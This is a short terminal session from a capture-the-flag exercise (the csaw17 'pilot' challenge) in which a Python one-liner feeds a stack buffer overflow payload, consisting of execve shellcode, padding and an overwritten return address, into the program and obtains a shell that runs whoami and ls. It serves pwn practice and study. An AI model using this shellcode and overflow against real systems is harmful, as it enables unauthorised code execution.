user@User-Pc:~/home/GIT/IVAN/Pwning/Nightmare/stackOverflow/csaw17_pilot$ (python -c "addressBuf='\xe0\xdb\xff\xff\xff\x7f\x00\x00';payload='';shellcode='\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05';payload+=shellcode;payload+='A'*(40-len(shellcode));payload+=addressBuf;print payload" ;cat)| ./pilot 
[*]Welcome DropShip Pilot...
[*]I am your assitant A.I....
[*]I will be guiding you through the tutorial....
[*]As a first step, lets learn how to land at the designated location....
[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
[*]Good Luck Pilot!....
[*]Location:0x7fffffffdbe0
[*]Command:whoami
user
ls
exp.txt  exploit.py  pilot  readme.md
echo OK
OK

